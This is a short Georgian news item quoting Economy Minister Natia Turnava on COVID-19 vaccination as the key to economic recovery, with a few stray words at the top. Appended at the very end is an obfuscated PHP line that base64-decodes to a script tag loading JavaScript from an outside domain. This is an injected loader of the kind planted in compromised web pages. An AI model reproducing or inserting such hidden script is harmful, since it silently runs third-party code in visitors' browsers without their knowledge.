celsiusi
ავერსი საქკაბელი
ეკონომიკისა და მდგრადი განვითარების მინისტრ ნათია თურნავას განცხადებით, "ეპიდემიოლოგიური ვითარება მარტივი არ არის, რადგან ინფიცირების მაჩვენებელი ყოველდღიურად იზრდება, ხოლო სიტუაციიდან გამოსავალი მხოლოდ ვაქცინაციაშია".
 
„ზაფხულის მოსვლასთან და მობილობის გაზრდასთან ერთად, ინფიცირების მაჩვენებელიც იზრდება, თუმცა დღეს მყარად ვართ იმ პოზიციაზე, რომ შესაძლებელია ისე ვებრძოლოთ პანდემიას, რომ არანაირად არ შევაფერხოთ ჩვენი ეკონომიკა, რადგან ვხედავთ, რომ ჩვენი ეკონომიკის გაჯანსაღების მთავარი საწინდარი არის  ამა თუ იმ დარგის შეუფერხებელი ფუნქციონირება და მით უფრო მაშინ, როცა 3 მილიონამდე დოზა სხვადასხვა ვაქცინა გვაქვს ხელმისაწვდომი, მათ შორის „ფაიზერიც“. არანაირი პრობლემა იმასთან დაკავშირებით, თუ როგორ უნდა ავიცრათ, არის თუ არა ვაქცინების საკმარისი რაოდენობა და ა.შ. აღარ არსებობს“, - განაცხადა ნათია თურნავამ.
 
მისივე თქმით, ვაქცინაციის პროცესში მთავრობის წევრებიც ჩართულნი არიან და აცრის პროცესს ეწრებიან.
 
ამასთან, მინისტრმა აღნიშნა, რომ პირადად იყო არაერთ საწარმოში, სადაც თანამშრომელთა ვაქცინაცია მიმდინარეობს.
 
„ვაქცინაცია არის ერთადერთი გზა, რომ ეკონომიკის გაჯანსაღება გავაგრძელოთ, დავძლიოთ სიღარიბე და პანდემიამ არ დაარტყას ეკონომიკას“, - განაცხადა ნათია თურნავამ.
1180
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");